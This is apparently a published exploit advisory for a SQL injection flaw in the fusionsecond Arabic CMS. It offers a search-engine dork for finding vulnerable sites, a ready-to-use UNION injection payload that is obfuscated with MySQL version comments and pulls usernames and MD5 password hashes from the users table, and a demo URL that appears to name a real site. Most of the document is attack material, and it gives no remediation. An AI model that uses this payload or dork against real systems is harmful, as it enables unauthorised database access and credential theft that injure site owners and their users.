#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: fusionsecond ARABIC CMS SQL injection
# Date: 2019-05-15
# Dork : intext:"تطوير وتصميم فيوجن سكند" inurl:*id=
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.fusionsecond.com/
# Version: All Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection ) Nullix Security Team of IRan
[+] parameter : ID == php?ID=
=================================================================================
Mode Hash : MD5
=================
[#] Testing Method:
[+] - UNION query
=================================================================================
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Exploit ==>
id=-2826 /*!50000Union*/ /*!50000Select*/ 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(/*!50000users*/)WHERE(@x)IN(@x:=/*!50000CONCAT(0x20,@x,0x75736572,0x203d3d3e20,username,0x3c62723e,0x70617373,0x203d3d3e20,password,0x3c62723e,0x3c62723e)*/)))x),4,5,6,7,8,9,10,11--
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] https://www.aleftoday.org/article.php?id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @NullixTM
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#